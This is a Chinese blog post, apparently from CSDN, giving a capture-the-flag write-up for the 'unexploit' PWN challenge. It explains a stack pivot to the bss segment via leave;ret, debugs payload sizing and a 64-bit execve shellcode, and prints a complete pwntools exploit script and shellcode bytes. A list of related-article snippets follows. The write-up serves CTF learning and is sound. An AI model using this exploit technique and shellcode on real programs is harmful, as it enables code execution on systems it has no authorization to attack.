安恒杯 7月赛PWN-unexploit 经验总结

最新推荐文章于 2021-11-14 14:59:01 发布
最新推荐文章于 2021-11-14 14:59:01 发布
阅读量871 收藏 1
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/96104580
版权

通过这题发现自己的有很多知识点短板
解题思路:
在这里插入图片描述
read函数读取的缓冲区在 rbp-buf 也就是rbp - 0x8 处,那么控制了rbp的值指向我们可以写的区域(比如bss段)就可以在那个区域植入shellcode,再控制ret跳转到shellcode的地址就可以getshell了
具体做法:
把栈段切换到bss段,也就是让bss成为栈段
开始进行溢出的时先把rbp的值覆盖为 bss_addr - 0x8, 然后执行
leave(mov rsp, rbp pop rbp)
ret
时leave指令会把rbp的值 覆盖为 bss_addr - 0x8, rsp保持原样,随后再次ret到 lea rax, [rbp+buf] 处,继续调用read函数

第二次调用read函数时,缓冲区为rbp - 0x8 也就是 bss_addr - 0x10 处,构造bss段的数据前先看看后面的leave 指令会把rsp, rbp改变为何值
rbp = bss_addr - 0x8
leave -> rsp = rbp
也就是rsp 会指向bss_addr - 0x8 , 再经过 pop rbp, rsp 就指向 bss_addr了,也就是ret 的地址再 bss_addr 处, 再经过retrsp的值为bss_addr + 0x8
至于rbp的值由我们控制

payload构造想法:
bss_addr - 0x8 的数据构造成 bss_addr + 0x8 ,这样下次调用read函数时缓冲区从bss_addr 开始,之后再是lea rax, [rbp+buf] 处的地址
所以**payload2 = 'a’0x8 + p64(bss_addr + 0x8) + p64(read) + 'a’0x8

第三次调用read函数,接下来考虑shellcode的放置地址
缓冲区开始抵制在bss_addr 处,由于后面call read的时候会把下一条指令的地址入栈,所以在调用read函数的过程中rsp的值会变成bss_addr ,指向read函数ret的地址,所以把这个地址覆盖成shellcode 的返回地址就可以成功执行shellcode从而getshell
payload3 = p64(bss_addr + 8) + shellcode

以下为写Exp过程碰到的问题:

**1.**题目中的read(0, &buf, 0x20);
图1:
在这里插入图片描述
上图是看了被人wp 知道了思路后自己写的Exp,红色箭头处是发生读取错误的地方,
图2:
在这里插入图片描述
本意是想把数据送入 bss-0x10 处,数据分布本应该是:
图3:
在这里插入图片描述
然而却发生了图2 那样的错误,然后我就不断调试,看了很久才终于发现了错误,既然read函数读取32 个字节那么它就会读取32个字节, 把图1中第一处箭头 看作是上一次read函数读取的数据的话,那么第一次调用read函数读取的字节就是32字节,然后第二次read函数 读取数据是从 p64(bss - 0x8) 开始读取,由于不够32个字节,所以只读取了
p64(bss - 0x8)
p64(read)
的数据,只有16个字节,再读取后面payload中的16个字节就出现了图2的现象…
把每一次payload 都构造成32 字节的数据的话就会出现图3 的正确结果

**2.**64位shellcode
我试过好几个64位shellcode,在动态调试的时候不知为何在执行push rsp指令的时候总是会抛出SIGSEGV错误,黑人问号(???
在这里插入图片描述
在这里插入图片描述
不得已去寻找其他shellcode,找到了下面的shellcode
汇编源码:
链接

	xor 	rsi,	rsi			
	push	rsi				
	mov 	rdi,	0x68732f2f6e69622f	 
	push	rdi
	push	rsp		
	pop	rdi				
	mov 	al,	59			
	cdq					
	syscall

但是有 push rsp 指令,所以我改动了一下:

section .text
        global _start
_start:
        xor rsi, rsi
        push rsi
        mov rdi, 0x68732f2f6e69622f
        push rdi
        mov rdi, rsp
        mov al, 59
        cdq
        syscall

之后再提取的机器码为:
"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x99\x0f\x05"
拿到机器码后兴冲冲再去测试一下,然后又出现了EOF错误,然后再去调试…
在这里插入图片描述
看到没有push rdi 指令,黑人问号(???
然后仔细检查,发现push rdi 指令的机器码(57)混入了**/bin/sh的机器码中,然后再检查/bin//sh的机器码,发现少了条’/’, 也就是少了个2f**,
在这里插入图片描述
就出现了上图箭头处的情况,黑人问号(???,然后我尝试手动加上那个被吞入异次元的2f,shellcode变为
"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x99\x0f\x05"
最后终于getshell,我哭了…

在这里插入图片描述

最终Exp:

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
p = process("./unexploit")
#context.terminal = ['tmux', 'splitw', '-h']
#gdb.attach(proc.pidof(p)[0], gdbscript="b *0x400678")

elf = ELF("./unexploit")

bss = elf.bss() + 0x800
read = 0x40068A

payload = 'a'*0x8
payload += p64(bss - 0x8)
payload += p64(read)
payload += 'a'*0x8
p.send(payload)

payload = 'a'*0x8
payload += p64(bss + 0x8)
payload += p64(read)
payload += 'a'*0x8
p.send(payload)

payload = p64(bss + 0x8)
payload += "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x99\x0f\x05"
p.send(payload)

p.interactive()
苍崎青子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
有趣的Shellcode和栈
whklhhhh的博客
03-26 2万+
学弟问了一个ctf-wiki上pwn入门题的知识点,本身没什么意思 题目下载链接 - sniperoj-pwn100-shellcode-x86-64 题目简介 很明显栈溢出,buf位于栈顶,栈空间为0x10个字节(可以从buf的位置rsp+0rbp-10h看出),所以栈分布为 内容 偏移 buf rsp last_rbp rsp+0x10 ret_addr rsp+0x...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
函数调用堆栈
dgj8300的专栏
04-12 618
原文出处: 痞子辉          这是我的第一篇博客,由于公司项目需要,将暂时告别C语言一段时间。所以在此记录一下自己之前学习C语言的一些心得体会,希望可以分享给大家,也可以记录下自己学习过程遇到的问题以及存在的疑惑(其实就是自己学习过程不解的地方)。好了,废话不多说,开始微博内容了,O(∩_∩)O哈哈~ 接下来将通过下面几个问题解析函数调用对堆栈理解: 函数调用过
pwn 安恒月赛unexploit
doudoudedi
10-01 344
直接进入主函数查看 可以供我们溢出的空间很少这里就要涉及到栈迁移了需要用到寄存器ebp,esp指令leave;ret leave==mov esp,ebp;pop ebp ret ==pop eip 我们能控制执行流然后继续跳入read函数因为read的读入位置是和ebp有关的所以可以控制栈的位置 所以我们先将ebp置为bss-0x8 然后跳到read读入的数据会到bss段然后将bss+0x...
栈帧push的汇编解释
惜兰blog
07-25 4626
栈帧push的汇编解释 下面是常见的反汇编代码 push %rbp mov %rsp,%rbp push %rbx sub $0x18,%rsp pop %rbx pop %rbp retq push %rbp是把%rbp寄存器的值保存到内存里面的数组模拟栈,结合下面的mov %rsp,%rbp可以知道,%rbp此刻pysg的就是上面一个栈帧的栈低位置,同时mov也将本初始化为0长度的栈帧低保存起来,因为此刻rsp是上一个栈帧的栈顶位置,刚好就是我的栈底位置。所以m
go语言调度器源代码情景分析之五:汇编指令
weixin_30888027的博客
04-26 177
本文是《go调度器源代码情景分析》系列 第一章 预备知识的第4小节。 汇编语言是每位后端程序员都应该掌握的一门语言,因为学会了汇编语言,不管是对我们调试程序还是研究与理解计算机底层的一些运行原理都具有非常重要的作用,所以建议有兴趣的读者可以多花点时间把它学好。 与高级编程语言一样,汇编语言也是一门完整的计算机编程语言,它所涉及的知识内容也很多,好在我们的主要目标是通过对本小节的学习而有能力去读...
2020安恒杯元旦月赛-爆破鬼才-ZIP注释信息+CRC32爆破+outguess隐写爆破+生日字典
xnightmare的博客
01-03 2108
MISC 爆破鬼才 给出的是一个压缩包,压缩包有注释信息,注释信息给出了解压密码的范围: 使用ARCHPC爆破即可得到密码:abc123 解压之后里面又是一个压缩包,压缩包里面包含几个文件: 使用010 Editor查看具体信息之后发现360给出的文件大小其实是不准确的,1.txt、2.txt、3.txt压缩前的大小分别为4 bytes、2 bytes、2 bytes,因此可以用CRC32碰...
安恒杯-misc-附件资源
03-05
安恒杯-misc-附件资源
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈某个局部变量写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF比赛的常见题型
11-13
CTF比赛的常见题型目录,给初学者提供学习方向。CTF(Capture The Flag)文一般译作夺旗赛,在网络安全领域指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
2021“安恒·泰山杯”山东省网络安全大赛 (1).rar
12-07
2021“安恒·泰山杯”山东省网络安全大赛 CTF 真题
指令集模型计算机,CSAPP 第四章 Y86-64指令集
weixin_42155721的博客
07-25 1709
7月242019简化的计算机模型和指令集为了研究处理器的架构, CSAPP设计了一套简化的计算机模型和对应的指令集叫做Y86-64. 主要特点如下:15个寄存器, 不包括%r15. 这样内部寻址可以用0-15来选择寄存器. %rsp依然用作栈指针每个寄存器都报保存64位=8字节值, 机器里操作的所有值也都是8字节长三个一位的条件码: ZF SF 和 OF程序计数器 PC有一个状态码 Stat 用于...
栈的使用(push、pop详解)学习笔记
weixin_42492218的博客
11-14 2万+
概念: 栈是一种数据结构,可以添加或者删除值,不过要遵循“后进先出”的原则。通过 push 操作把数据压入栈,通过pop操作删除数据;它具有一个属性:弹出的值永远是最近被压入而且仍然在栈的值。 栈可以实现为一个数组,总是从数组的一端插入和删除元素。这一端被称为栈顶。在x86-64,程序栈存放在内存某个区域。栈顶元素的地址是所有栈元素地址最低的。(根据惯例,我们的栈是倒过来画的,栈“顶”在图的底部。)栈指针%rsp保存着栈顶元素的地址。 PUSHQ与...
[Assembly] 程序的机器级表示(三):栈指令、算术和逻辑指令
Pangda code twice
06-02 4895
栈指令 指令 效果 描述 pushq S R[%rsp]←R[%rsp] - 8
汇编指令push,mov,call,pop,leave,ret建立与释放栈的过程
热门推荐
liu_if_else的博客
05-28 2万+
感觉这东西有点烧脑,花了一下午时间终于整个捋顺了整个流程。 想理解好此过程,理解每个指令的作用,必须结合指令行地址,栈地址和寄存器一起来分析,否则很容易被绕晕。 大图图片说明:内存地址,汇编指令都为简写,用的十进制,栈空间1个格子大小是4*8=32位(对应32位操作系统),指令行长度应为1-6字节,都简化为1字节。为了简化汇编指令行,函数都没有参数。实际执行顺序一列,左边为寄存器或栈空间地址,
x86-64 下函数调用及栈帧原理
奔跑的企鹅
06-10 1万+
一蓑一笠一扁舟,一丈丝纶一寸钩。 一曲高歌一樽酒,一人独钓一江秋。 ——题秋江独钓图缘起在 C/C++ 程序,函数调用是十分常见的操作。那么,这一操作的底层原理是怎样的?编译器帮我们做了哪些操作?CPU 各寄存器及内存堆栈在函数调用时是如何被使用的?栈帧的创建和恢复是如何完成的?针对上述问题,本本文进行了探索和研究。通用寄存器使用惯例函数调用时,在硬件层面我们
简单函数的调用原理
Zorro Lang Red Space
10-10 4886
上文我们提到了系统调用,现在说一下函数调用。函数调用应该是一个编程者除了写if...else以外最常写的东西了,记得多年前我第一次写一个C语言函数的时候还觉得很神奇。我们的程序不能只有一个代码段,那么做将使得程序很难协同开发和维护,将程序分割为部分进行封装,每一部分都定义良好的接口,这是非常重要的,我一直觉得封装和接口是人类进步的基本方式。好吧,这里我们不讨论封装和接口,我们讨论函数是怎么调用和返
处理器指令编码可重定义的方法_深入理解计算机系统——处理器体系结构
weixin_39997311的博客
11-24 1522
处理器体系结构简介首先,本章不是《处理器制造从入门到精通》,也不是《沙子到i9-10980XE的过程详解》,而是旨在介绍处理器指令以及处理器硬件设计,并希望借此可以更加深刻地理解计算机系统。一个处理器支持的指令和指令的字节级编码称为它的指令集体系结构(ISA)。一般来说,现代处理器并不是一次处理一个指令,而是把一个指令分割成多个小的执行序列,交叉执行,并使用流水线执行法来提高效率。比方说,一个把内...
安恒堡垒机 root密码
最新发布
09-08
安恒堡垒机是一款网络安全产品,用于管理和控制企业的网络设备,保障网络的安全。其的root密码是用于登录和操作安恒堡垒机的超级管理员账户。 root密码在安恒堡垒机具有最高的权限,只有拥有root密码的用户才能执行一些特殊的操作,如配置设备、修改权限、管理用户等。 为了确保安全性,建议设置强密码作为root密码,包括大小写字母、数字和特殊字符的组合,并定期更换密码。同时,也应该遵循一些常规的安全原则,如不将root密码告知他人、不在公共场所输入密码等。 对于忘记root密码的情况,我们可以通过以下方式进行找回或重置: 1. 利用默认的账户,如admin或administrator登录,并在设置找到重置密码的选项。按照系统的提示进行操作,重新设置root密码。 2. 如果无法通过默认账户找回密码,可以尝试使用密码找回功能。输入已绑定的安全邮箱或手机号码,根据系统的提示进行操作,重新设置root密码。 3. 如果以上方法无法找回密码,可以联系安恒堡垒机的技术支持,提供必要的身份证明和证明所有权的相关材料,请求技术支持人员协助重置密码。 总之,root密码对于安恒堡垒机来说非常重要,我们应该妥善保管和管理,确保只有授权的人员能够使用和操作堡垒机,从而提高企业的网络安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值